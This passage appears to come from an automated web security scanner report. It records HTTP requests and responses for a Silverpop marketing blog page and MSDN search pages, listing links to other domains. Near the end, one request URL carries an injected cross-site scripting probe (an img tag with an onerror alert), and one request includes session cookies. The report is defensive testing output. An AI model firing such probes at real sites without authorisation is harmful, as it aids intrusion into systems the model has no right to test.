User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: silverpopweb01.beacontec.com

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Jul 2011 19:55:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://silverpopweb01.beacontec.com/blogs/email-marketing/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 22 Jul 2011 19:55:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60701
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<met
...[SNIP]...
<link rel="shortcut icon" href="http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/themes/atahualpa344/images/favicon/silverpop.ico" /><link rel="alternate" type="application/rss+xml" title="Silverpop Blog RSS Feed" href="http://www.silverpop.com/blogs/email-marketing/feed" />
<link rel="alternate" type="application/atom+xml" title="Silverpop Blog Atom Feed" href="http://www.silverpop.com/blogs/email-marketing/feed/atom" />
<link rel="pingback" href="http://silverpopweb01.beacontec.com/blogs/email-marketing/xmlrpc.php" />
...[SNIP]...
<link rel='stylesheet' id='wdgpo_voting_style-css' href='http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css?ver=3.1.3' type='text/css' media='all' />
<script type="text/javascript" src="http://apis.google.com/js/plusone.js">{lang: "en-US"}</script>
...[SNIP]...
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-includes/wlwmanifest.xml" />
<link rel='index' title='Silverpop Blog' href='http://www.silverpop.com/blogs/email-marketing' />


...[SNIP]...
<td rowspan="2" valign="middle" class="logoarea-logo"><a href="http://www.silverpop.com"><img class="logo" src="http://silverpopweb01.beacontec.com/blogs/email-marketing/wp-content/themes/atahualpa344/images/logo.png" alt="Silverpop Blog" />
...[SNIP]...
<h1 class="blogtitle"><a href="http://www.silverpop.com/blogs/email-marketing/">Silverpop Blog</a>
...[SNIP]...
<div class="clearfix rss-box"><a class="comments-icon" href="http://www.silverpop.com/blogs/email-marketing/comments/feed" title="Subscribe to the COMMENTS feed">Comments</a><a class="email-icon" href="http://feedburner.google.com/fb/a/mailverify?uri=QuietRevolutionInEmailMarketing&loc=en_US" title="Subscribe by EMAIL">By Email</a><a class="posts-icon" href="http://www.silverpop.com/blogs/email-marketing/feed" title="Subscribe to the POSTS feed">Posts</a>
...[SNIP]...
<h2>
           <a href="http://www.silverpop.com/blogs/email-marketing/whereoware-abandoned-cart-campaign.html" rel="bookmark" title="Permanent Link to Guest Blog: Whereoware on How to Pull Off an Abandoned Cart Campaign">Guest Blog: Whereoware on How to Pull Off an Abandoned Cart Campaign</a>
...[SNIP]...
<h2>
           <a href="http://www.silverpop.com/blogs/email-marketing/silverpop-vendor-council-marketing-automation-institute.html" rel="bookmark" title="Permanent Link to Silverpop Joins Vendor Council for Marketing Automation Institute">Silverpop Joins Vendor Council for Marketing Automation Institute</a>
...[SNIP]...
<h2>
           <a href="http://www.silverpop.com/blogs/email-marketing/reporting-tools-5-questions.html" rel="bookmark" title="Permanent Link to Are You Making the Most of Reporting Tools? 5 Questions to Ask">Are You Making the Most of Reporting Tools? 5 Questions to Ask</a>
...[SNIP]...
<h2>
           <a href="http://www.silverpop.com/blogs/email-marketing/places-promote-email-program-during-holidays.html" rel="bookmark" title="Permanent Link to 10 Places to Promote Your Email Program During the Holidays">10 Places to Promote Your Email Program During the Holidays</a>
...[SNIP]...
<h2>
           <a href="http://www.silverpop.com/blogs/email-marketing/five-questions-simone-vincent-myvouchercodes-co-uk.html" rel="bookmark" title="Permanent Link to 5 Questions: Simone Vincent, Email Marketing Manager, MyVoucherCodes.co.uk">5 Questions: Simone Vincent, Email Marketing Manager, MyVoucherCodes.co.uk</a>
...[SNIP]...
<h2>
           <a href="http://www.silverpop.com/blogs/email-marketing/dolphin-training-incentives.html" rel="bookmark" title="Permanent Link to Dolphin Training, Email Marketing and Incentives">Dolphin Training, Email Marketing and Incentives</a>
...[SNIP]...
<h2>
           <a href="http://www.silverpop.com/blogs/email-marketing/top-500-retailer-survey-2011.html" rel="bookmark" title="Permanent Link to Top 500 Survey Shows Retailers Have Room to Improve">Top 500 Survey Shows Retailers Have Room to Improve</a>
...[SNIP]...
<h2>
           <a href="http://www.silverpop.com/blogs/email-marketing/why-humanizing-content-is-important.html" rel="bookmark" title="Permanent Link to Why Humanizing Content Is Important">Why Humanizing Content Is Important</a>
...[SNIP]...
<h2>
           <a href="http://www.silverpop.com/blogs/email-marketing/mocial-survey-3findings.html" rel="bookmark" title="Permanent Link to Silverpop’s Mocial Survey: 3 Surprising Findings">Silverpop's Mocial Survey: 3 Surprising Findings</a>
...[SNIP]...
<h2>
           <a href="http://www.silverpop.com/blogs/email-marketing/2011-emea-client-conference-one-for-the-record-books.html" rel="bookmark" title="Permanent Link to EMEA Client Conference...One for the Record Books">EMEA Client Conference—One for the Record Books</a>
...[SNIP]...
<div class="newer">  <a href="http://www.silverpop.com/blogs/email-marketing/wp-content/plugins/google/css/plusone.css/page/2?ver=3.1.3" >Older Entries »</a>
...[SNIP]...
<li class="page_item page-item-550"><a href="http://www.silverpop.com/blogs/email-marketing/about-the-authors" title="About the Authors">About the Authors</a>
...[SNIP]...
<li class="page_item page-item-551"><a href="http://www.silverpop.com/blogs/email-marketing/contact-the-authors" title="Contact the Authors">Contact the Authors</a>
...[SNIP]...
<li class="cat-item cat-item-294"><a href="http://www.silverpop.com/blogs/email-marketing/category/b2b-marketing" title="View all posts filed under B2B Marketing">B2B Marketing</a>
...[SNIP]...
<li class="cat-item cat-item-483"><a href="http://www.silverpop.com/blogs/email-marketing/category/behavioral-targeting" title="View all posts filed under Behavioral Targeting">Behavioral Targeting</a>
...[SNIP]...
<li class="cat-item cat-item-484"><a href="http://www.silverpop.com/blogs/email-marketing/category/data-segmentation" title="View all posts filed under Data and Segmentation">Data and Segmentation</a>
...[SNIP]...
<li class="cat-item cat-item-19"><a href="http://www.silverpop.com/blogs/email-marketing/category/deliverability" title="View all posts filed under Deliverability">Deliverability</a>
...[SNIP]...
<li class="cat-item cat-item-270"><a href="http://www.silverpop.com/blogs/email-marketing/category/demand-generation" title="View all posts filed under Demand Generation">Demand Generation</a>
...[SNIP]...
<li class="cat-item cat-item-485"><a href="http://www.silverpop.com/blogs/email-marketing/category/email-creative" title="View all posts filed under Email Creative">Email Creative</a>
...[SNIP]...
<li class="cat-item cat-item-181"><a href="http://www.silverpop.com/blogs/email-marketing/category/email-marketing" title="View all posts filed under Email Marketing">Email Marketing</a>
...[SNIP]...
<li class="cat-item cat-item-170"><a href="http://www.silverpop.com/blogs/email-marketing/category/events" title="View all posts filed under Events">Events</a>
</li>
   <li class="cat-item cat-item-271"><a href="http://www.silverpop.com/blogs/email-marketing/category/lead-management" title="View all posts filed under Lead Management">Lead Management</a>
...[SNIP]...
<li class="cat-item cat-item-232"><a href="http://www.silverpop.com/blogs/email-marketing/category/marketing-automation" title="View all posts filed under Marketing Automation">Marketing Automation</a>
...[SNIP]...
<li class="cat-item cat-item-486"><a href="http://www.silverpop.com/blogs/email-marketing/category/metrics-analytics" title="View all posts filed under Metrics and Analytics">Metrics and Analytics</a>
...[SNIP]...
<li class="cat-item cat-item-7"><a href="http://www.silverpop.com/blogs/email-marketing/category/misc" title="View all posts filed under Misc">Misc</a>
</li>
   <li class="cat-item cat-item-142"><a href="http://www.silverpop.com/blogs/email-marketing/category/mobile" title="View all posts filed under Mobile">Mobile</a>
</li>
   <li class="cat-item cat-item-197"><a href="http://www.silverpop.com/blogs/email-marketing/category/multi-channel-marketing" title="View all posts filed under Multichannel Marketing">Multichannel Marketing</a>
...[SNIP]...
<li class="cat-item cat-item-487"><a href="http://www.silverpop.com/blogs/email-marketing/category/nurturing" title="View all posts filed under Nurturing">Nurturing</a>
...[SNIP]...
<li class="cat-item cat-item-488"><a href="http://www.silverpop.com/blogs/email-marketing/category/privacy-permission" title="View all posts filed under Privacy and Permission">Privacy and Permission</a>
...[SNIP]...
<li class="cat-item cat-item-276"><a href="http://www.silverpop.com/blogs/email-marketing/category/sales-marketing-alignment" title="View all posts filed under Sales and Marketing Alignment">Sales and Marketing Alignment</a>
...[SNIP]...
<li class="cat-item cat-item-489"><a href="http://www.silverpop.com/blogs/email-marketing/category/scoring" title="View all posts filed under Scoring">Scoring</a>
</li>
   <li class="cat-item cat-item-490"><a href="http://www.silverpop.com/blogs/email-marketing/category/social" title="View all posts filed under Social">Social</a>
</li>
   <li class="cat-item cat-item-277"><a href="http://www.silverpop.com/blogs/email-marketing/category/software-as-a-service" title="View all posts filed under Software-as-a-service">Software-as-a-service</a>
...[SNIP]...
<li class="cat-item cat-item-491"><a href="http://www.silverpop.com/blogs/email-marketing/category/trends" title="View all posts filed under Trends">Trends</a>
...[SNIP]...
<div class="tagcloud"><a href='http://www.silverpop.com/blogs/email-marketing/tag/b2b-best-practices' class='tag-link-284' title='23 topics' style='font-size: 14.688888888889pt;'>b2b best practices</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/b2b-buyer' class='tag-link-285' title='32 topics' style='font-size: 16.866666666667pt;'>B2B buyer</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/b2b-buying-behavior' class='tag-link-286' title='18 topics' style='font-size: 13.133333333333pt;'>B2B buying behavior</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/b2b-buying-process' class='tag-link-287' title='18 topics' style='font-size: 13.133333333333pt;'>B2B buying process</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/b2b-lead-management' class='tag-link-293' title='19 topics' style='font-size: 13.444444444444pt;'>b2b lead management</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/b2b-marketing' class='tag-link-294' title='44 topics' style='font-size: 18.888888888889pt;'>B2B Marketing</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/b2b-marketing-content' class='tag-link-296' title='14 topics' style='font-size: 11.577777777778pt;'>B2B marketing content</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/b2b-marketing-university' class='tag-link-297' title='19 topics' style='font-size: 13.444444444444pt;'>B2B Marketing University</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/b2b-sales' class='tag-link-299' title='10 topics' style='font-size: 9.4pt;'>B2B sales</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/best-practices' class='tag-link-10' title='21 topics' style='font-size: 14.066666666667pt;'>Best Practices</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/buyer-centric' class='tag-link-309' title='14 topics' style='font-size: 11.577777777778pt;'>buyer-centric</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/buyer-centric-marketing' class='tag-link-310' title='22 topics' style='font-size: 14.377777777778pt;'>buyer-centric marketing</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/buyer-dialogue' class='tag-link-306' title='9 topics' style='font-size: 8.7777777777778pt;'>buyer dialogue</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/content-development' class='tag-link-324' title='9 topics' style='font-size: 8.7777777777778pt;'>content development</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/content-marketing' class='tag-link-326' title='13 topics' style='font-size: 11.111111111111pt;'>content marketing</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/crm' class='tag-link-332' title='15 topics' style='font-size: 11.888888888889pt;'>CRM</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/deliverability' class='tag-link-19' title='24 topics' style='font-size: 15pt;'>Deliverability</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/demand-generation' class='tag-link-270' title='33 topics' style='font-size: 17.022222222222pt;'>Demand Generation</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/dialogue' class='tag-link-349' title='12 topics' style='font-size: 10.488888888889pt;'>dialogue</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/email' class='tag-link-196' title='9 topics' style='font-size: 8.7777777777778pt;'>Email</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/email-marketing' class='tag-link-181' title='69 topics' style='font-size: 22pt;'>Email Marketing</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/email-marketing-best-practices' class='tag-link-218' title='24 topics' style='font-size: 15pt;'>email marketing best practices</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/engagement-marketing' class='tag-link-20' title='12 topics' style='font-size: 10.488888888889pt;'>Engagement Marketing</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/facebook' class='tag-link-67' title='17 topics' style='font-size: 12.822222222222pt;'>Facebook</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/google' class='tag-link-28' title='10 topics' style='font-size: 9.4pt;'>Google</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/iphone' class='tag-link-125' title='8 topics' style='font-size: 8pt;'>iPhone</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/lead-management' class='tag-link-271' title='30 topics' style='font-size: 16.4pt;'>Lead Management</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/lead-nurturing' class='tag-link-171' title='32 topics' style='font-size: 16.866666666667pt;'>Lead Nurturing</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/lead-scoring' class='tag-link-272' title='18 topics' style='font-size: 13.133333333333pt;'>Lead Scoring</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/marketing' class='tag-link-403' title='9 topics' style='font-size: 8.7777777777778pt;'>marketing</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/marketing-automation' class='tag-link-232' title='51 topics' style='font-size: 19.977777777778pt;'>Marketing Automation</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/marketing-channels' class='tag-link-407' title='10 topics' style='font-size: 9.4pt;'>marketing channels</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/marketing-strategy' class='tag-link-420' title='12 topics' style='font-size: 10.488888888889pt;'>marketing strategy</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/mobile' class='tag-link-142' title='10 topics' style='font-size: 9.4pt;'>Mobile</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/personas' class='tag-link-441' title='9 topics' style='font-size: 8.7777777777778pt;'>personas</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/privacy' class='tag-link-31' title='9 topics' style='font-size: 8.7777777777778pt;'>privacy</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/relationships' class='tag-link-140' title='14 topics' style='font-size: 11.577777777778pt;'>relationships</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/relevance' class='tag-link-164' title='13 topics' style='font-size: 11.111111111111pt;'>relevance</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/roi' class='tag-link-146' title='9 topics' style='font-size: 8.7777777777778pt;'>ROI</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/sales-marketing-alignment' class='tag-link-276' title='10 topics' style='font-size: 9.4pt;'>Sales and Marketing Alignment</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/sms' class='tag-link-141' title='9 topics' style='font-size: 8.7777777777778pt;'>SMS</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/social-media' class='tag-link-191' title='23 topics' style='font-size: 14.688888888889pt;'>social media</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/targeting' class='tag-link-136' title='8 topics' style='font-size: 8pt;'>Targeting</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/twitter' class='tag-link-45' title='18 topics' style='font-size: 13.133333333333pt;'>Twitter</a>
<a href='http://www.silverpop.com/blogs/email-marketing/tag/webinars' class='tag-link-172' title='11 topics' style='font-size: 10.022222222222pt;'>Webinars</a>
...[SNIP]...

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

18.116. http://social.msdn.microsoft.com/Search/en-US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/Search/en-US

Issue detail

The page was loaded from a URL containing a query string:

http://social.msdn.microsoft.com/Search/en-US?query=xss&beta=0&ac=8

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://blog.stackoverflow.com/2008/06/safe-html-and-xss/
http://blogs.msdn.com/b/dross/archive/2008/03/10/xss-focused-attack-surface-reduction.aspx
http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx
http://blogs.msdn.com/b/ieinternals/archive/2011/05/19/socially-engineered-xss-attacks-and-pasting-javascript-in-the-address-bar-in-ie9.aspx
http://code.jquery.com/jquery-1.6.1.min.js
http://forums.asp.net/p/1684170/4432913.aspx/1?XSS+attack+problem
http://forums.asp.net/p/1696226/4489480.aspx/1?XSS
http://forums.asp.net/t/1285731.aspx
http://i1.social.s-msft.com/GlobalResources/images/trans.gif
http://i1.social.s-msft.com/Search/GlobalResources/Images/Msdn/networklogo_Msdn.png
http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/GlobalResources/images/Msdn/favicon.ico
http://i1.social.s-msft.com/Search/GlobalResources/scripts/common.min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/Styles/global.css?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/scriptloader.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css
http://img4.catalog.video.msn.com/image.aspx?uuid=8d62ffd0-6576-4140-9169-3a0f337d0c33&w=136&h=102
http://msstonojssocial.112.2o7.net/b/ss/msstonojssocial/1/H.20.2--NS/0
http://stackoverflow.com/questions/2051632/ie8-xss-filter-what-does-it-really-do
http://stackoverflow.com/questions/tagged/xss
http://weblogs.asp.net/rrobbins/archive/2007/10/19/xslt-for-a-dataset-designer-xss-file.aspx
http://www.codeproject.com/KB/aspnet/PoweryourselfagainstXSS.aspx
http://www.omniture.com/
http://xss.codeplex.com/
http://xss.codeplex.com/license
http://xss.codeplex.com/releases
http://xss.codeplex.com/team/view
http://xssattack.codeplex.com/
http://xssattack.codeplex.com/license
http://xssattack.codeplex.com/team/view
https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=social.msdn.microsoft.com&wreply=https%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss%26beta%3d0%26ac%3d8%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn

Request

GET /Search/en-US?query=xss&beta=0&ac=8 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://social.msdn.microsoft.com/search/en-US
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: social.msdn.microsoft.com
Proxy-Connection: Keep-Alive
Cookie: MC0=1311396851498; A=I&I=AxUFAAAAAAB3CAAAgcVmZd5G6L3BAISOia0DUg!!; MSID=Microsoft.CreationDate=07/07/2011 15:17:00&Microsoft.LastVisitDate=07/23/2011 04:54:36&Microsoft.VisitStartDate=07/23/2011 04:54:06&Microsoft.CookieId=5f269ddf-903a-4297-aeeb-cca051ae84b8&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=9&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0052-6728-5832-1105; MC1=GUID=9f4507fc155a574cb422f82242928527&HASH=fc07&LV=20117&V=3; omniID=1310166844969_ad13_25fb_5a74_7dddf20c48a3; WT_FPC=id=173.193.214.243-3932679216.30162104:lv=1311386079573:ss=1311386079573; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; MUID=3320E7738B0764152F29E55B8F07641E; s_cc=true; s_sq=%5B%5BB%5D%5D; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=0a5f0a68-2007-4a70-bf6f-1327a038b2c3&Microsoft.CreationDate=07/23/2011 04:54:06&Microsoft.LastVisitDate=07/23/2011 04:54:36&Microsoft.NumberOfVisits=3&SessionCookie.Id=7B453F107B39934ED06646F81EF53849; MS0=d4013204c5c94dfcab27f527769f3ab8; ADS=SN=175A21EF; WT_NVR=0=/:1=en-us

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:54:52 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB39
Date: Sat, 23 Jul 2011 04:54:51 GMT
ntCoent-Length: 62244
Content-Length: 62244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1">

<link rel="shortcut icon" href="http://i1.social.s-msft.com/Search/GlobalResources/images/Msdn/favicon.ico" type="image/x-icon" />
<link href="http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css" rel="Stylesheet" type="text/css" /><meta name="CommunityInfo" content=" B=Msdn;A=Social;L=en-US;" />
<script src="http://code.jquery.com/jquery-1.6.1.min.js" type="text/javascript" language="javascript"></script>

<link rel="STYLESHEET" type="text/css" href="http://i1.social.s-msft.com/Search/Styles/global.css?cver=1864.870%0d%0a" />
<title>
...[SNIP]...
<div class="PassportScarab">
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=social.msdn.microsoft.com&wreply=https%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss%26beta%3d0%26ac%3d8%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn">Sign in</a>
...[SNIP]...
<a id="NetworkLink" href="http://Msdn.microsoft.com/en-US">
<img id="NetworkTaglineLogo" src="http://i1.social.s-msft.com/Search/GlobalResources/Images/Msdn/networklogo_Msdn.png" />
</a>
...[SNIP]...
<a href="/search/en-US/feed?query=xss&format=RSS"><img src="http://i1.social.s-msft.com/GlobalResources/images/trans.gif" class="rssfeed" alt="Results in RSS" title="Results in RSS"></a>
...[SNIP]...
<td class="result">
<a href="http://blogs.msdn.com/b/ieinternals/archive/2011/05/19/socially-engineered-xss-attacks-and-pasting-javascript-in-the-address-bar-in-ie9.aspx" onclick="trackClick(this, '109', 'http\x3a\x2f\x2fblogs.msdn.com\x2fb\x2fieinternals\x2farchive\x2f2011\x2f05\x2f19\x2fsocially-engineered-xss-attacks-and-pasting-javascript-in-the-address-bar-in-ie9.aspx', '5');">Socially-Engineered <b>
...[SNIP]...
<td class="result">
<a href="http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx" onclick="trackClick(this, '109', 'http\x3a\x2f\x2fblogs.msdn.com\x2fb\x2fie\x2farchive\x2f2008\x2f07\x2f02\x2fie8-security-part-iv-the-xss-filter.aspx', '6');">IE8 Security Part IV: The <b>
...[SNIP]...
<td class="result">
<a href="http://forums.asp.net/p/1696226/4489480.aspx/1?XSS" onclick="trackClick(this, '112', 'http\x3a\x2f\x2fforums.asp.net\x2fp\x2f1696226\x2f4489480.aspx\x2f1\x3fXSS', '7');"><b>
...[SNIP]...
<td class="result">
<a href="http://stackoverflow.com/questions/tagged/xss" onclick="trackClick(this, '500', 'http\x3a\x2f\x2fstackoverflow.com\x2fquestions\x2ftagged\x2fxss', '9');">Newest '<b>
...[SNIP]...
<td class="result">
<a href="http://xss.codeplex.com/" onclick="trackClick(this, '456', 'http\x3a\x2f\x2fxss.codeplex.com\x2f', '10');">x5s - test encodings and character transformations to find <b>
...[SNIP]...
</span>
<a href="http://xss.codeplex.com/team/view" class="ResultMetaDataLink">3</a>
...[SNIP]...
</span>
<a href="http://xss.codeplex.com/license" class="ResultMetaDataLink">Custom</a>
...[SNIP]...
<div class="StatusInfo">
<a href="http://xss.codeplex.com/releases">x5s v1.0.1 beta</a>
...[SNIP]...
<td class="result">
<a href="http://xssattack.codeplex.com/" onclick="trackClick(this, '456', 'http\x3a\x2f\x2fxssattack.codeplex.com\x2f', '11');"><b>
...[SNIP]...
</span>
<a href="http://xssattack.codeplex.com/team/view" class="ResultMetaDataLink">2</a>
...[SNIP]...
</span>
<a href="http://xssattack.codeplex.com/license" class="ResultMetaDataLink">Ms-PL</a>
...[SNIP]...
<div class="ResultStatusVideo">
<img src="http://img4.catalog.video.msn.com/image.aspx?uuid=8d62ffd0-6576-4140-9169-3a0f337d0c33&w=136&h=102" />
</div>
...[SNIP]...
<td class="result">
<a href="http://blogs.msdn.com/b/dross/archive/2008/03/10/xss-focused-attack-surface-reduction.aspx" onclick="trackClick(this, '109', 'http\x3a\x2f\x2fblogs.msdn.com\x2fb\x2fdross\x2farchive\x2f2008\x2f03\x2f10\x2fxss-focused-attack-surface-reduction.aspx', '13');"><b>
...[SNIP]...
<td class="result">
<a href="http://www.codeproject.com/KB/aspnet/PoweryourselfagainstXSS.aspx" onclick="trackClick(this, '501', 'http\x3a\x2f\x2fwww.codeproject.com\x2fKB\x2faspnet\x2fPoweryourselfagainstXSS.aspx', '14');">Power yourself against <b>
...[SNIP]...
<td class="result">
<a href="http://stackoverflow.com/questions/2051632/ie8-xss-filter-what-does-it-really-do" onclick="trackClick(this, '500', 'http\x3a\x2f\x2fstackoverflow.com\x2fquestions\x2f2051632\x2fie8-xss-filter-what-does-it-really-do', '15');">internet explorer 8 - IE8 <b>
...[SNIP]...
<td class="result">
<a href="http://forums.asp.net/p/1684170/4432913.aspx/1?XSS+attack+problem" onclick="trackClick(this, '112', 'http\x3a\x2f\x2fforums.asp.net\x2fp\x2f1684170\x2f4432913.aspx\x2f1\x3fXSS\x2battack\x2bproblem', '17');"><b>
...[SNIP]...
<td class="result">
<a href="http://weblogs.asp.net/rrobbins/archive/2007/10/19/xslt-for-a-dataset-designer-xss-file.aspx" onclick="trackClick(this, '109', 'http\x3a\x2f\x2fweblogs.asp.net\x2frrobbins\x2farchive\x2f2007\x2f10\x2f19\x2fxslt-for-a-dataset-designer-xss-file.aspx', '18');">XSLT For A DataSet Designer <b>
...[SNIP]...
<td class="result">
<a href="http://blog.stackoverflow.com/2008/06/safe-html-and-xss/" onclick="trackClick(this, '500', 'http\x3a\x2f\x2fblog.stackoverflow.com\x2f2008\x2f06\x2fsafe-html-and-xss\x2f', '19');">Safe HTML and <b>
...[SNIP]...
<td class="result">
<a href="http://forums.asp.net/t/1285731.aspx" onclick="trackClick(this, '112', 'http\x3a\x2f\x2fforums.asp.net\x2ft\x2f1285731.aspx', '20');"><b>
...[SNIP]...
<a href="/search/en-US/feed?query=xss&format=RSS"><img src="http://i1.social.s-msft.com/GlobalResources/images/trans.gif" class="rssfeed" alt="Results in RSS" title="Results in RSS"></a>
...[SNIP]...
<div align="center" class="AdWidthFix" id="SearchAd" name="SearchAd" style="margin:auto;"><script language="javascript" src="http://Ads1.msn.com/library/dap.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://i1.social.s-msft.com/Search/scriptloader.js?cver=1864.870%0d%0a"></script>

<script src="http://i1.social.s-msft.com/Search/GlobalResources/scripts/common.min.js?cver=1864.870%0d%0a" type="text/javascript" language="javascript"></script>

<script src="http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js?cver=1864.870%0d%0a" type="text/javascript" language="javascript"></script>
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://msstonojssocial.112.2O7.net/b/ss/msstonojssocial/1/H.20.2--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

18.117. http://social.msdn.microsoft.com/Search/en-US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/Search/en-US

Issue detail

The page was loaded from a URL containing a query string:

http://social.msdn.microsoft.com/Search/en-US?query=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&Refinement=123&ac=8

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://code.jquery.com/jquery-1.6.1.min.js
http://i1.social.s-msft.com/Search/GlobalResources/Images/Msdn/networklogo_Msdn.png
http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/GlobalResources/images/Msdn/favicon.ico
http://i1.social.s-msft.com/Search/GlobalResources/scripts/common.min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/Styles/global.css?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/scriptloader.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css
